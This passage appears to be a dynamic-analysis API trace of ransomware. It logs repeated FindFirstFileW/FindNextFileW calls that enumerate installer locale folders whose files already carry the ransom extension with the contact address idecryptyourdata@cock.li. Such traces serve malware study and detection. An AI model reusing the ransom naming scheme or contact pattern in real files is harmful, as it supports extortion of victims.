ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x15206, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.539] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0a1541, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0a1541, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0c761b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.539] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0a1541, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0a1541, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd0c761b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.539] FindClose (in: hFindFile=0x728388 | out: hFindFile=0x728388) returned 1 [0155.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.540] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1033", cAlternateFileName="")) returned 1 [0155.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.540] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728348 [0155.542] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.542] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd481149, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd481149, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd4a74ae, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xd64, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.543] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd4a74ae, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd4a74ae, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd4f38ea, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x12eb6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.543] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0c761b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0c761b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd519b42, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.543] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd0c761b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd0c761b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd519b42, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.543] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0155.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.544] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1035", cAlternateFileName="")) returned 1 [0155.544] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.544] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728308 [0155.556] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.556] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd4cd5fb, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd4cd5fb, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd519b42, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf64, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.556] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd4f38ea, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd4f38ea, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd58c1f7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x12dd6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.556] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd113c12, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd113c12, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd58c1f7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.556] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd113c12, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd113c12, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd58c1f7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.557] FindClose (in: hFindFile=0x728308 | out: hFindFile=0x728308) returned 1 [0155.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.557] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1036", cAlternateFileName="")) returned 1 [0155.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.558] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x7283c8 [0155.560] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.560] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd519b42, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd519b42, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd565f3a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xeb4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.560] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd58c1f7, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd58c1f7, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd5b254b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x14516, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.561] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3c291e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3c291e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd3e87bc, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.561] FindNextFileW (in: hFindFile=0x7283c8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3c291e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3c291e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd3e87bc, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.561] FindClose (in: hFindFile=0x7283c8 | out: hFindFile=0x7283c8) returned 1 [0155.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.562] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1037", cAlternateFileName="")) returned 1 [0155.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.562] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728188 [0155.571] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.571] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5b254b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5b254b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd5b254b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1bb4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.571] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5d863b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5d863b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd670f91, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x11a86, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.571] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3e87bc, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3e87bc, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd3e87bc, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4258, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.571] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd3e87bc, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd3e87bc, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd3e87bc, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4258, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.571] FindClose (in: hFindFile=0x728188 | out: hFindFile=0x728188) returned 1 [0155.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.572] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1038", cAlternateFileName="")) returned 1 [0155.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.572] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727f88 [0155.574] FindNextFileW (in: hFindFile=0x727f88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.574] FindNextFileW (in: hFindFile=0x727f88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd5d863b, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd5d863b, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd670f91, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x1184, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.574] FindNextFileW (in: hFindFile=0x727f88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd670f91, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd670f91, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd6982b5, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x152a6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.574] FindNextFileW (in: hFindFile=0x727f88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd40eb60, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd40eb60, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd40eb60, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.575] FindNextFileW (in: hFindFile=0x727f88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd40eb60, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd40eb60, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd40eb60, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.575] FindClose (in: hFindFile=0x727f88 | out: hFindFile=0x727f88) returned 1 [0155.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.575] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1040", cAlternateFileName="")) returned 1 [0155.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.576] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728188 [0155.702] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.702] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6bd59c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6bd59c, ftLastAccessTime.dwHighDateTime=0x1d5038d, 